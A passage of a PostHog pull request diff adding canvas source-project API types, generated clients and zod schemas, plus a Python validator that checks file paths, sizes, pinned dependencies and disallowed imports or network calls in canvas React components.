### PR TITLE
feat(canvas): typed canvas source tools and bundled authoring skills

### DIFF
--- a/frontend/src/generated/core/api.schemas.ts
+++ b/frontend/src/generated/core/api.schemas.ts
@@ -2816,6 +2816,164 @@ export interface CanvasPublishConflictApi {
     current_version_id: string | null
 }
 
+/**
+ * Project files keyed by relative path (forward slashes, no '..'). Until the canvas build service ships, only "index.html" and "src/canvas.tsx" (the single React component the canvas mounts) are supported.
+ */
+export type CanvasSourceProjectApiFiles = { [key: string]: string }
+
+/**
+ * Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog/quill, recharts, lucide-react, dayjs) at their pinned versions.
+ */
+export type CanvasSourceProjectApiDependencies = { [key: string]: string }
+
+/**
+ * A canvas's multi-file source project — the canonical write format for canvas source.
+ *
+ * Until the canvas build service ships, projects are constrained to the
+ * legacy-compatible shape: `index.html` (a fixed synthetic shell) plus
+ * `src/canvas.tsx` (the single React component the runtime mounts).
+ */
+export interface CanvasSourceProjectApi {
+    /** Source-project schema version. Currently always 1. */
+    schemaVersion: number
+    /** Project files keyed by relative path (forward slashes, no '..'). Until the canvas build service ships, only "index.html" and "src/canvas.tsx" (the single React component the canvas mounts) are supported. */
+    files: CanvasSourceProjectApiFiles
+    /** The project's entry HTML file. Currently always "index.html". */
+    entryHtml: string
+    /** Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog/quill, recharts, lucide-react, dayjs) at their pinned versions. */
+    dependencies?: CanvasSourceProjectApiDependencies
+    /** Version of the host-injected `ph` canvas SDK the project targets. */
+    canvasSdkVersion?: string
+}
+
+/**
+ * Payload for publishing a complete canvas source project.
+ */
+export interface CanvasSourcePublishApi {
+    /** The complete source project to publish. */
+    project: CanvasSourceProjectApi
+    /** Short description of the change, stored on the appended version history entry. */
+    prompt?: string
+    /** Optional new display name for the canvas (rewrites the leaf segment of its path). */
+    name?: string
+    /**
+     * Optimistic-concurrency guard: the current_version_id the publisher based its edits on (null when it read a canvas with no versions yet). When the canvas has since moved past it the publish is rejected with a 409 version_conflict instead of overwriting the newer head. Omit to publish unguarded.
+     * @nullable
+     */
+    expected_current_version_id?: string | null
+}
+
+/**
+ * Identity and version pointers for one canvas (a desktop 'dashboard' entry).
+ */
+export interface CanvasSummaryApi {
+    /** The canvas's desktop file-system id. */
+    id: string
+    /** Display name of the canvas (the leaf segment of its path). */
+    name: string
+    /**
+     * File-system id of the channel (folder) the canvas belongs to, when recorded.
+     * @nullable
+     */
+    channel_id: string | null
+    /**
+     * Id of the live source version — pass as expected_current_version_id on publish. Null before the first publish.
+     * @nullable
+     */
+    current_version_id: string | null
+    /** Number of source versions in the canvas's history. */
+    version_count: number
+    /** When the canvas was created. */
+    created_at: string
+}
+
+/**
+ * * `error` - error
+ * * `warning` - warning
+ */
+export type DiagnosticSeverityEnumApi = (typeof DiagnosticSeverityEnumApi)[keyof typeof DiagnosticSeverityEnumApi]
+
+export const DiagnosticSeverityEnumApi = {
+    Error: 'error',
+    Warning: 'warning',
+} as const
+
+/**
+ * One structured validation/build diagnostic for a canvas source project.
+ */
+export interface CanvasDiagnosticApi {
+    /** 'error' blocks publishing; 'warning' is advisory and does not block.
+     *
+     * * `error` - error
+     * * `warning` - warning */
+    severity: DiagnosticSeverityEnumApi
+    /** Stable machine-readable diagnostic code, e.g. 'import_not_allowed' or 'unsupported_file'. */
+    code: string
+    /** Human-readable description of the problem and how to fix it. */
+    message: string
+    /** Project-relative path of the file the diagnostic points at, when file-specific. */
+    path?: string
+    /** 1-based line number within `path`, when the diagnostic points at a specific line. */
+    line?: number
+}
+
+/**
+ * Result of a successful source-project publish.
+ */
+export interface CanvasSourcePublishResponseApi {
+    /** The canvas after the publish, including the new version pointer. */
+    canvas: CanvasSummaryApi
+    /** Id of the source version this publish created. */
+    current_version_id: string
+    /** Advisory (warning-severity) diagnostics recorded for the published project. */
+    diagnostics: CanvasDiagnosticApi[]
+}
+
+/**
+ * 400 body for a publish whose source project failed validation.
+ */
+export interface CanvasSourceInvalidApi {
+    /** Human-readable summary of why the project was rejected. */
+    detail: string
+    /** Always "invalid_source_project". */
+    code: string
+    /** The validation diagnostics, including at least one error. */
+    diagnostics: CanvasDiagnosticApi[]
+}
+
+/**
+ * A canvas's source project plus the version pointer edits must be based on.
+ */
+export interface CanvasSourceResponseApi {
+    /** Identity and version pointers for the canvas. */
+    canvas: CanvasSummaryApi
+    /** The canvas's source project. Legacy single-file canvases are presented as a synthetic project. */
+    project: CanvasSourceProjectApi
+    /**
+     * The live source version this project reflects — pass as expected_current_version_id when publishing an edit. Null before the first publish.
+     * @nullable
+     */
+    current_version_id: string | null
+}
+
+/**
+ * Payload for validating a candidate source project without publishing it.
+ */
+export interface CanvasValidateRequestApi {
+    /** The candidate source project to validate. */
+    project: CanvasSourceProjectApi
+}
+
+/**
+ * Validation outcome for a candidate source project.
+ */
+export interface CanvasValidateResponseApi {
+    /** True when the project has no error-severity diagnostics. */
+    valid: boolean
+    /** Structured diagnostics; errors block publishing, warnings are advisory. */
+    diagnostics: CanvasDiagnosticApi[]
+}
+
 export interface ContextGenerationApi {
     /**
      * ID of the Task currently generating this folder's CONTEXT.md, or null if none.
@@ -2892,6 +3050,16 @@ export interface PaginatedFolderInstructionsVersionListApi {
     /** @nullable */
     previous?: string | null
     results: FolderInstructionsVersionApi[]
+}
+
+/**
+ * Payload for creating a new, empty canvas in a channel.
+ */
+export interface CanvasCreateApi {
+    /** Display name for the canvas. Slashes are replaced with spaces. */
+    name: string
+    /** Desktop file-system id of the channel (folder) to create the canvas in. */
+    channel_id: string
 }
 
 export interface FileSystemShortcutApi {
@@ -4043,6 +4211,17 @@ export type DesktopFileSystemInstructionsVersionsListParams = {
      * The initial index from which to return the results.
      */
     offset?: number
+    /**
+     * A search term.
+     */
+    search?: string
+}
+
+export type DesktopFileSystemCanvasesListParams = {
+    /**
+     * Only return canvases inside this channel (desktop folder id).
+     */
+    channel_id?: string
     /**
      * A search term.
      */

--- a/frontend/src/generated/core/api.ts
+++ b/frontend/src/generated/core/api.ts
@@ -13,9 +13,17 @@ import type {
     BulkUpdateTagsResponseApi,
     CIMDVerificationTokenApi,
     CIMDVerificationTokenWithValueApi,
+    CanvasCreateApi,
+    CanvasSourcePublishApi,
+    CanvasSourcePublishResponseApi,
+    CanvasSourceResponseApi,
+    CanvasSummaryApi,
+    CanvasValidateRequestApi,
+    CanvasValidateResponseApi,
     CimdVerificationTokensListParams,
     ContextGenerationApi,
     ContextGenerationSetApi,
+    DesktopFileSystemCanvasesListParams,
     DesktopFileSystemInstructionsVersionsListParams,
     DesktopFileSystemListParams,
     DesktopFileSystemShortcutListParams,
@@ -1458,6 +1466,77 @@ export const desktopFileSystemCanvasPartialUpdate = async (
     })
 }
 
+export const getDesktopFileSystemCanvasPublishCreateUrl = (projectId: string, id: string) => {
+    return `/api/projects/${projectId}/desktop_file_system/${id}/canvas/publish/`
+}
+
+/**
+ * Publish a complete canvas source project as the canvas's new head version.
+ *
+ * Validates the project first — an error-severity diagnostic rejects the
+ * publish with 400 and leaves the canvas untouched. Guarded publishing via
+ * `expected_current_version_id` rejects a stale base with 409 instead of
+ * overwriting newer work.
+ */
+export const desktopFileSystemCanvasPublishCreate = async (
+    projectId: string,
+    id: string,
+    canvasSourcePublishApi: CanvasSourcePublishApi,
+    options?: RequestInit
+): Promise<CanvasSourcePublishResponseApi> => {
+    return apiMutator<CanvasSourcePublishResponseApi>(getDesktopFileSystemCanvasPublishCreateUrl(projectId, id), {
+        ...options,
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json', ...options?.headers },
+        body: JSON.stringify(canvasSourcePublishApi),
+    })
+}
+
+export const getDesktopFileSystemCanvasSourceRetrieveUrl = (projectId: string, id: string) => {
+    return `/api/projects/${projectId}/desktop_file_system/${id}/canvas/source/`
+}
+
+/**
+ * Read a canvas's source project and the version pointer edits must be based on.
+ *
+ * Legacy single-file canvases are presented as a synthetic web project whose
+ * `src/canvas.tsx` holds the stored React component.
+ */
+export const desktopFileSystemCanvasSourceRetrieve = async (
+    projectId: string,
+    id: string,
+    options?: RequestInit
+): Promise<CanvasSourceResponseApi> => {
+    return apiMutator<CanvasSourceResponseApi>(getDesktopFileSystemCanvasSourceRetrieveUrl(projectId, id), {
+        ...options,
+        method: 'GET',
+    })
+}
+
+export const getDesktopFileSystemCanvasValidateCreateUrl = (projectId: string, id: string) => {
+    return `/api/projects/${projectId}/desktop_file_system/${id}/canvas/validate/`
+}
+
+/**
+ * Validate a candidate source project without publishing it.
+ *
+ * Side-effect free: returns the same structured diagnostics a publish would
+ * enforce, so agents can iterate until the project is publishable.
+ */
+export const desktopFileSystemCanvasValidateCreate = async (
+    projectId: string,
+    id: string,
+    canvasValidateRequestApi: CanvasValidateRequestApi,
+    options?: RequestInit
+): Promise<CanvasValidateResponseApi> => {
+    return apiMutator<CanvasValidateResponseApi>(getDesktopFileSystemCanvasValidateCreateUrl(projectId, id), {
+        ...options,
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json', ...options?.headers },
+        body: JSON.stringify(canvasValidateRequestApi),
+    })
+}
+
 export const getDesktopFileSystemContextGenerationRetrieveUrl = (projectId: string, id: string) => {
     return `/api/projects/${projectId}/desktop_file_system/${id}/context_generation/`
 }
@@ -1679,6 +1758,61 @@ export const desktopFileSystemMoveCreate = async (
         method: 'POST',
         headers: { 'Content-Type': 'application/json', ...options?.headers },
         body: JSON.stringify(fileSystemApi),
+    })
+}
+
+export const getDesktopFileSystemCanvasesListUrl = (
+    projectId: string,
+    params?: DesktopFileSystemCanvasesListParams
+) => {
+    const normalizedParams = new URLSearchParams()
+
+    Object.entries(params || {}).forEach(([key, value]) => {
+        if (value !== undefined) {
+            normalizedParams.append(key, value === null ? 'null' : String(value))
+        }
+    })
+
+    const stringifiedParams = normalizedParams.toString()
+
+    return stringifiedParams.length > 0
+        ? `/api/projects/${projectId}/desktop_file_system/canvases/?${stringifiedParams}`
+        : `/api/projects/${projectId}/desktop_file_system/canvases/`
+}
+
+/**
+ * List the project's canvases, newest first (capped at 100).
+ */
+export const desktopFileSystemCanvasesList = async (
+    projectId: string,
+    params?: DesktopFileSystemCanvasesListParams,
+    options?: RequestInit
+): Promise<CanvasSummaryApi[]> => {
+    return apiMutator<CanvasSummaryApi[]>(getDesktopFileSystemCanvasesListUrl(projectId, params), {
+        ...options,
+        method: 'GET',
+    })
+}
+
+export const getDesktopFileSystemCanvasesCreateUrl = (projectId: string) => {
+    return `/api/projects/${projectId}/desktop_file_system/canvases/`
+}
+
+/**
+ * Create a new, empty canvas in a channel.
+ *
+ * The canvas starts with no source; publish a source project to give it one.
+ */
+export const desktopFileSystemCanvasesCreate = async (
+    projectId: string,
+    canvasCreateApi: CanvasCreateApi,
+    options?: RequestInit
+): Promise<CanvasSummaryApi> => {
+    return apiMutator<CanvasSummaryApi>(getDesktopFileSystemCanvasesCreateUrl(projectId), {
+        ...options,
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json', ...options?.headers },
+        body: JSON.stringify(canvasCreateApi),
     })
 }
 

--- a/frontend/src/generated/core/api.zod.ts
+++ b/frontend/src/generated/core/api.zod.ts
@@ -9004,6 +9004,96 @@ export const DesktopFileSystemCanvasPartialUpdateBody = /* @__PURE__ */ zod
     .describe("Payload for publishing a freeform canvas's React source via the agent.")
 
 /**
+ * Publish a complete canvas source project as the canvas's new head version.
+ *
+ * Validates the project first — an error-severity diagnostic rejects the
+ * publish with 400 and leaves the canvas untouched. Guarded publishing via
+ * `expected_current_version_id` rejects a stale base with 409 instead of
+ * overwriting newer work.
+ */
+export const desktopFileSystemCanvasPublishCreateBodyProjectOneCanvasSdkVersionDefault = `0.1.0`
+
+export const DesktopFileSystemCanvasPublishCreateBody = /* @__PURE__ */ zod
+    .object({
+        project: zod
+            .object({
+                schemaVersion: zod.number().describe('Source-project schema version. Currently always 1.'),
+                files: zod
+                    .record(zod.string(), zod.string())
+                    .describe(
+                        'Project files keyed by relative path (forward slashes, no \'..\'). Until the canvas build service ships, only \"index.html\" and \"src\/canvas.tsx\" (the single React component the canvas mounts) are supported.'
+                    ),
+                entryHtml: zod.string().describe('The project\'s entry HTML file. Currently always \"index.html\".'),
+                dependencies: zod
+                    .record(zod.string(), zod.string())
+                    .optional()
+                    .describe(
+                        'Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog\/quill, recharts, lucide-react, dayjs) at their pinned versions.'
+                    ),
+                canvasSdkVersion: zod
+                    .string()
+                    .default(desktopFileSystemCanvasPublishCreateBodyProjectOneCanvasSdkVersionDefault)
+                    .describe('Version of the host-injected `ph` canvas SDK the project targets.'),
+            })
+            .describe(
+                "A canvas's multi-file source project — the canonical write format for canvas source.\n\nUntil the canvas build service ships, projects are constrained to the\nlegacy-compatible shape: `index.html` (a fixed synthetic shell) plus\n`src\/canvas.tsx` (the single React component the runtime mounts)."
+            )
+            .describe('The complete source project to publish.'),
+        prompt: zod
+            .string()
+            .optional()
+            .describe('Short description of the change, stored on the appended version history entry.'),
+        name: zod
+            .string()
+            .optional()
+            .describe('Optional new display name for the canvas (rewrites the leaf segment of its path).'),
+        expected_current_version_id: zod
+            .string()
+            .nullish()
+            .describe(
+                'Optimistic-concurrency guard: the current_version_id the publisher based its edits on (null when it read a canvas with no versions yet). When the canvas has since moved past it the publish is rejected with a 409 version_conflict instead of overwriting the newer head. Omit to publish unguarded.'
+            ),
+    })
+    .describe('Payload for publishing a complete canvas source project.')
+
+/**
+ * Validate a candidate source project without publishing it.
+ *
+ * Side-effect free: returns the same structured diagnostics a publish would
+ * enforce, so agents can iterate until the project is publishable.
+ */
+export const desktopFileSystemCanvasValidateCreateBodyProjectOneCanvasSdkVersionDefault = `0.1.0`
+
+export const DesktopFileSystemCanvasValidateCreateBody = /* @__PURE__ */ zod
+    .object({
+        project: zod
+            .object({
+                schemaVersion: zod.number().describe('Source-project schema version. Currently always 1.'),
+                files: zod
+                    .record(zod.string(), zod.string())
+                    .describe(
+                        'Project files keyed by relative path (forward slashes, no \'..\'). Until the canvas build service ships, only \"index.html\" and \"src\/canvas.tsx\" (the single React component the canvas mounts) are supported.'
+                    ),
+                entryHtml: zod.string().describe('The project\'s entry HTML file. Currently always \"index.html\".'),
+                dependencies: zod
+                    .record(zod.string(), zod.string())
+                    .optional()
+                    .describe(
+                        'Exact-version dependencies, restricted to the platform-supported set (react, react-dom, @posthog\/quill, recharts, lucide-react, dayjs) at their pinned versions.'
+                    ),
+                canvasSdkVersion: zod
+                    .string()
+                    .default(desktopFileSystemCanvasValidateCreateBodyProjectOneCanvasSdkVersionDefault)
+                    .describe('Version of the host-injected `ph` canvas SDK the project targets.'),
+            })
+            .describe(
+                "A canvas's multi-file source project — the canonical write format for canvas source.\n\nUntil the canvas build service ships, projects are constrained to the\nlegacy-compatible shape: `index.html` (a fixed synthetic shell) plus\n`src\/canvas.tsx` (the single React component the runtime mounts)."
+            )
+            .describe('The candidate source project to validate.'),
+    })
+    .describe('Payload for validating a candidate source project without publishing it.')
+
+/**
  * Set or clear the Task associated with this folder's CONTEXT.md generation.
  */
 export const DesktopFileSystemContextGenerationUpdateBody = /* @__PURE__ */ zod.object({
@@ -9100,6 +9190,18 @@ export const DesktopFileSystemMoveCreateBody = /* @__PURE__ */ zod.object({
     meta: zod.unknown().optional(),
     shortcut: zod.boolean().nullish(),
 })
+
+/**
+ * Create a new, empty canvas in a channel.
+ *
+ * The canvas starts with no source; publish a source project to give it one.
+ */
+export const DesktopFileSystemCanvasesCreateBody = /* @__PURE__ */ zod
+    .object({
+        name: zod.string().describe('Display name for the canvas. Slashes are replaced with spaces.'),
+        channel_id: zod.string().describe('Desktop file-system id of the channel (folder) to create the canvas in.'),
+    })
+    .describe('Payload for creating a new, empty canvas in a channel.')
 
 /**
  * Get count of all files in a folder.

--- a/posthog/api/file_system/canvas_source.py
+++ b/posthog/api/file_system/canvas_source.py
@@ -1,0 +1,301 @@
+"""Compatibility adapter between canvas source projects and legacy `meta.code` canvases.
+
+A canvas source project is the multi-file write format for canvases (see the
+canvas application build pipeline plan). Until the build service ships, every
+canvas is still stored as a single React file in the dashboard row's
+`meta.code`; this module maps between the two shapes:
+
+- a legacy canvas is presented as a *synthetic* source project whose entry
+  mounts the stored React component;
+- a published source project is validated against the legacy runtime's
+  constraints (single component file, whitelisted imports) and reduced back to
+  `meta.code`.
+
+Everything here is pure — no I/O, no ORM — so it can be exercised without a
+database and reused by the build workers later.
+"""
+
+import re
+from typing import Any
+
+CANVAS_SOURCE_SCHEMA_VERSION = 1
+CANVAS_ENTRY_HTML = "index.html"
+# The single agent-editable file of a legacy canvas: the React component the
+# runtime mounts. Named so a later real web project can keep the same layout.
+CANVAS_COMPONENT_PATH = "src/canvas.tsx"
+# Version of the host-injected `ph` postMessage bridge the legacy runtime speaks.
+CANVAS_SDK_VERSION = "0.1.0"
+
+MAX_SOURCE_FILES = 64
+MAX_FILE_BYTES = 512 * 1024
+MAX_TOTAL_BYTES = 2 * 1024 * 1024
+
+# Platform-supported dependencies, pinned to the exact versions the legacy
+# runtime's import map resolves (mirrors FREEFORM_WHITELIST in posthog/code).
+PLATFORM_DEPENDENCIES: dict[str, str] = {
+    "react": "19.0.0",
+    "react-dom": "19.0.0",
+    "@posthog/quill": "0.3.0-beta.18",
+    "recharts": "2.15.0",
+    "lucide-react": "1.21.0",
+    "dayjs": "1.11.13",
+}
+
+# Import specifiers the legacy runtime resolves. Exact-match only, so a subpath
+# can't smuggle in an unreviewed entry point.
+ALLOWED_IMPORT_SPECIFIERS = frozenset(
+    [
+        "react",
+        "react-dom",
+        "react-dom/client",
+        "@posthog/quill",
+        "recharts",
+        "lucide-react",
+        "dayjs",
+    ]
+)
+
+# The synthetic entry shell. The legacy runtime compiles and mounts the default
+# export of the component file itself, so this file is informational: it makes
+# the project a self-describing web project and reserves the layout the build
+# service will compile for real.
+SYNTHETIC_INDEX_HTML = """<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
+  </head>
+  <body>
+    <div id="root"></div>
+    <!-- Legacy canvas: the host runtime mounts the default export of src/canvas.tsx. -->
+    <script type="module" src="/src/canvas.tsx"></script>
+  </body>
+</html>
+"""
+
+# Matches static module specifiers: `from "spec"` (import-with-bindings and
+# export-from) or a bare side-effect `import "spec"`. Regex-based like the
+# client-side check, so a literal `from "x"` inside a string can still fool it —
+# acceptable for the legacy tier; the build service parses for real.
+_STATIC_IMPORT_RE = re.compile(r"\bfrom\s*[\"']([^\"']+)[\"']|\bimport\s*[\"']([^\"']+)[\"']")
+
+# Out-of-band code loading the legacy sandbox rejects outright.
+_FORBIDDEN_PATTERNS: list[tuple[re.Pattern[str], str, str]] = [
+    (re.compile(r"\bimport\s*\("), "forbidden_dynamic_import", "dynamic import() is not allowed"),
+    (re.compile(r"\brequire\s*\("), "forbidden_require", "require() is not allowed"),
+    (re.compile(r"\bimportScripts\s*\("), "forbidden_import_scripts", "importScripts() is not allowed"),
+    (re.compile(r"<script\b", re.IGNORECASE), "forbidden_inline_script", "inline <script> is not allowed"),
+]
+
+# Direct network calls: the `ph` bridge is the only sanctioned data path. The
+# sandbox CSP blocks these at runtime, so surface them as warnings (the regex
+# can't tell code from a comment or string).
+_NETWORK_PATTERNS: list[tuple[re.Pattern[str], str, str]] = [
+    (
+        re.compile(r"\bfetch\s*\("),
+        "network_fetch",
+        "fetch() is blocked by the canvas sandbox — use the `ph` data bridge instead",
+    ),
+    (
+        re.compile(r"\bXMLHttpRequest\b"),
+        "network_xhr",
+        "XMLHttpRequest is blocked by the canvas sandbox — use the `ph` data bridge instead",
+    ),
+]
+
+_PATH_SEGMENT_RE = re.compile(r"^[A-Za-z0-9._@-]+$")
+
+
+def diagnostic(
+    severity: str, code: str, message: str, path: str | None = None, line: int | None = None
+) -> dict[str, Any]:
+    entry: dict[str, Any] = {"severity": severity, "code": code, "message": message}
+    if path is not None:
+        entry["path"] = path
+    if line is not None:
+        entry["line"] = line
+    return entry
+
+
+def has_errors(diagnostics: list[dict[str, Any]]) -> bool:
+    return any(entry["severity"] == "error" for entry in diagnostics)
+
+
+def synthetic_source_project(meta: dict[str, Any] | None) -> dict[str, Any]:
+    """Present a legacy `meta.code` canvas as a source project.
+
+    The component file carries the stored source verbatim (empty string for a
+    canvas that has never been published), and the entry HTML is the fixed
+    synthetic shell.
+    """
+    code = (meta or {}).get("code")
+    return {
+        "schemaVersion": CANVAS_SOURCE_SCHEMA_VERSION,
+        "files": {
+            CANVAS_ENTRY_HTML: SYNTHETIC_INDEX_HTML,
+            CANVAS_COMPONENT_PATH: code if isinstance(code, str) else "",
+        },
+        "entryHtml": CANVAS_ENTRY_HTML,
+        "dependencies": dict(PLATFORM_DEPENDENCIES),
+        "canvasSdkVersion": CANVAS_SDK_VERSION,
+    }
+
+
+def extract_legacy_code(project: dict[str, Any]) -> str:
+    """The single-file React source a valid legacy-compatible project reduces to."""
+    return project["files"][CANVAS_COMPONENT_PATH]
+
+
+def _validate_path(path: str) -> str | None:
+    if path == "" or path.startswith("/") or "\\" in path:
+        return "file paths must be relative, non-empty, and use forward slashes"
+    segments = path.split("/")
+    for segment in segments:
+        if segment in ("", ".", ".."):
+            return "file paths must not contain empty, '.', or '..' segments"
+        if not _PATH_SEGMENT_RE.match(segment):
+            return "file path segments may only contain letters, digits, '.', '_', '@', and '-'"
+    return None
+
+
+def _line_of(code: str, pattern: re.Pattern[str]) -> int | None:
+    match = pattern.search(code)
+    if match is None:
+        return None
+    return code.count("\n", 0, match.start()) + 1
+
+
+def _validate_component_source(code: str) -> list[dict[str, Any]]:
+    diagnostics: list[dict[str, Any]] = []
+
+    for pattern, code_name, message in _FORBIDDEN_PATTERNS:
+        line = _line_of(code, pattern)
+        if line is not None:
+            diagnostics.append(diagnostic("error", code_name, message, path=CANVAS_COMPONENT_PATH, line=line))
+
+    for pattern, code_name, message in _NETWORK_PATTERNS:
+        line = _line_of(code, pattern)
+        if line is not None:
+            diagnostics.append(diagnostic("warning", code_name, message, path=CANVAS_COMPONENT_PATH, line=line))
+
+    for match in _STATIC_IMPORT_RE.finditer(code):
+        specifier = match.group(1) or match.group(2)
+        if specifier and specifier not in ALLOWED_IMPORT_SPECIFIERS:
+            line = code.count("\n", 0, match.start()) + 1
+            diagnostics.append(
+                diagnostic(
+                    "error",
+                    "import_not_allowed",
+                    f'import of module "{specifier}" is not supported — allowed imports: '
+                    + ", ".join(sorted(ALLOWED_IMPORT_SPECIFIERS)),
+                    path=CANVAS_COMPONENT_PATH,
+                    line=line,
+                )
+            )
+
+    return diagnostics
+
+
+def validate_source_project(project: dict[str, Any]) -> list[dict[str, Any]]:
+    """Validate a candidate source project against the legacy-compatible contract.
+
+    Returns structured diagnostics; an empty list (or warnings only) means the
+    project is publishable. Mirrors the build pipeline's stage-1 validation
+    (schema, paths, file count, total size) plus the legacy runtime's
+    constraints, which stand in for the compile until the build service ships.
+    """
+    diagnostics: list[dict[str, Any]] = []
+
+    if project.get("schemaVersion") != CANVAS_SOURCE_SCHEMA_VERSION:
+        diagnostics.append(
+            diagnostic(
+                "error",
+                "unsupported_schema_version",
+                f"schemaVersion must be {CANVAS_SOURCE_SCHEMA_VERSION}",
+            )
+        )
+
+    if project.get("entryHtml") != CANVAS_ENTRY_HTML:
+        diagnostics.append(diagnostic("error", "invalid_entry", f'entryHtml must be "{CANVAS_ENTRY_HTML}"'))
+
+    files = project.get("files") or {}
+    if len(files) > MAX_SOURCE_FILES:
+        diagnostics.append(
+            diagnostic("error", "too_many_files", f"a source project may contain at most {MAX_SOURCE_FILES} files")
+        )
+
+    total_bytes = 0
+    for path, content in files.items():
+        path_problem = _validate_path(path)
+        if path_problem is not None:
+            diagnostics.append(diagnostic("error", "invalid_path", path_problem, path=path))
+            continue
+        size = len(content.encode("utf-8"))
+        total_bytes += size
+        if size > MAX_FILE_BYTES:
+            diagnostics.append(
+                diagnostic(
+                    "error",
+                    "file_too_large",
+                    f"file exceeds the {MAX_FILE_BYTES // 1024} KB per-file limit",
+                    path=path,
+                )
+            )
+    if total_bytes > MAX_TOTAL_BYTES:
+        diagnostics.append(
+            diagnostic(
+                "error",
+                "project_too_large",
+                f"the source project exceeds the {MAX_TOTAL_BYTES // 1024} KB total size limit",
+            )
+        )
+
+    # Legacy compatibility: until the build service ships, a canvas compiles to
+    # exactly one runtime-mounted component; other files can't be deployed.
+    for path in files:
+        if _validate_path(path) is None and path not in (CANVAS_ENTRY_HTML, CANVAS_COMPONENT_PATH):
+            diagnostics.append(
+                diagnostic(
+                    "error",
+                    "unsupported_file",
+                    f"only {CANVAS_ENTRY_HTML} and {CANVAS_COMPONENT_PATH} are supported until the canvas "
+                    "build service ships; move this code into the component file",
+                    path=path,
+                )
+            )
+    if CANVAS_COMPONENT_PATH not in files:
+        diagnostics.append(
+            diagnostic(
+                "error",
+                "missing_component",
+                f"the project must contain {CANVAS_COMPONENT_PATH} — the single React component the canvas mounts",
+                path=CANVAS_COMPONENT_PATH,
+            )
+        )
+
+    dependencies = project.get("dependencies") or {}
+    for name, version in dependencies.items():
+        pinned = PLATFORM_DEPENDENCIES.get(name)
+        if pinned is None:
+            diagnostics.append(
+                diagnostic(
+                    "error",
+                    "dependency_not_admitted",
+                    f'dependency "{name}" is not platform-supported — supported: '
+                    + ", ".join(sorted(PLATFORM_DEPENDENCIES)),
+                )
+            )
+        elif version != pinned:
+            diagnostics.append(
+                diagnostic(
+                    "error",
+                    "dependency_version_mismatch",
+                    f'dependency "{name}" must be the platform-pinned version {pinned}, got {version}',
+                )
+            )
+
+    component = files.get(CANVAS_COMPONENT_PATH)
+    if isinstance(component, str):
+        diagnostics.extend(_validate_component_source(component))
+
+    return diagnostics

--- a/posthog/api/file_system/file_system.py
+++ b/posthog/api/file_system/file_system.py
@@ -6,16 +6,24 @@ from typing import Any, cast
 from uuid import UUID, uuid4
 
 from django.conf import settings
+from django.core.exceptions import ValidationError as DjangoValidationError
 from django.db import transaction
 from django.db.models import Case, F, IntegerField, Q, QuerySet, Value, When
 from django.db.models.functions import Concat, Lower
 
-from drf_spectacular.utils import OpenApiResponse, extend_schema
+from drf_spectacular.utils import OpenApiParameter, OpenApiResponse, extend_schema
 from rest_framework import filters, pagination, serializers, status, viewsets
 from rest_framework.request import Request
 from rest_framework.response import Response
 
 from posthog.api.file_system.access_levels import FileSystemAccessLevelSerializerMixin
+from posthog.api.file_system.canvas_source import (
+    CANVAS_SDK_VERSION,
+    extract_legacy_code,
+    has_errors,
+    synthetic_source_project,
+    validate_source_project,
+)
 from posthog.api.file_system.deletion import (
     HOG_FUNCTION_TYPES,
     delete_file_system_object,
@@ -217,6 +225,10 @@ class FileSystemViewSet(TeamAndOrgViewSetMixin, viewsets.ModelViewSet):
         "count",
         "count_by_path",
         "context_generation",
+        "canvases",
+        "canvas_source",
+        # POST, but side-effect free: it only reports diagnostics.
+        "canvas_validate",
     ]
     scope_object_write_actions = [
         "create",
@@ -232,6 +244,8 @@ class FileSystemViewSet(TeamAndOrgViewSetMixin, viewsets.ModelViewSet):
         "undo_delete",
         "set_context_generation",
         "publish_canvas",
+        "create_canvas",
+        "publish_canvas_source",
     ]
 
     def _basename_regex(self, value: str) -> str:
@@ -1073,6 +1087,175 @@ class CanvasPublishConflictSerializer(serializers.Serializer):
     )
 
 
+class CanvasSourceProjectSerializer(serializers.Serializer):
+    """A canvas's multi-file source project — the canonical write format for canvas source.
+
+    Until the canvas build service ships, projects are constrained to the
+    legacy-compatible shape: `index.html` (a fixed synthetic shell) plus
+    `src/canvas.tsx` (the single React component the runtime mounts).
+    """
+
+    schemaVersion = serializers.IntegerField(
+        help_text="Source-project schema version. Currently always 1.",
+    )
+    files = serializers.DictField(
+        child=serializers.CharField(allow_blank=True, trim_whitespace=False),
+        help_text=(
+            "Project files keyed by relative path (forward slashes, no '..'). Until the canvas build "
+            'service ships, only "index.html" and "src/canvas.tsx" (the single React component the '
+            "canvas mounts) are supported."
+        ),
+    )
+    entryHtml = serializers.CharField(
+        help_text='The project\'s entry HTML file. Currently always "index.html".',
+    )
+    dependencies = serializers.DictField(
+        child=serializers.CharField(),
+        required=False,
+        default=dict,
+        help_text=(
+            "Exact-version dependencies, restricted to the platform-supported set (react, react-dom, "
+            "@posthog/quill, recharts, lucide-react, dayjs) at their pinned versions."
+        ),
+    )
+    canvasSdkVersion = serializers.CharField(
+        required=False,
+        default=CANVAS_SDK_VERSION,
+        help_text="Version of the host-injected `ph` canvas SDK the project targets.",
+    )
+
+
+class CanvasDiagnosticSerializer(serializers.Serializer):
+    """One structured validation/build diagnostic for a canvas source project."""
+
+    severity = serializers.ChoiceField(
+        choices=["error", "warning"],
+        help_text="'error' blocks publishing; 'warning' is advisory and does not block.",
+    )
+    code = serializers.CharField(
+        help_text="Stable machine-readable diagnostic code, e.g. 'import_not_allowed' or 'unsupported_file'.",
+    )
+    message = serializers.CharField(help_text="Human-readable description of the problem and how to fix it.")
+    path = serializers.CharField(
+        required=False,
+        help_text="Project-relative path of the file the diagnostic points at, when file-specific.",
+    )
+    line = serializers.IntegerField(
+        required=False,
+        help_text="1-based line number within `path`, when the diagnostic points at a specific line.",
+    )
+
+
+class CanvasSummarySerializer(serializers.Serializer):
+    """Identity and version pointers for one canvas (a desktop 'dashboard' entry)."""
+
+    id = serializers.UUIDField(help_text="The canvas's desktop file-system id.")
+    name = serializers.CharField(help_text="Display name of the canvas (the leaf segment of its path).")
+    channel_id = serializers.CharField(
+        allow_null=True,
+        help_text="File-system id of the channel (folder) the canvas belongs to, when recorded.",
+    )
+    current_version_id = serializers.CharField(
+        allow_null=True,
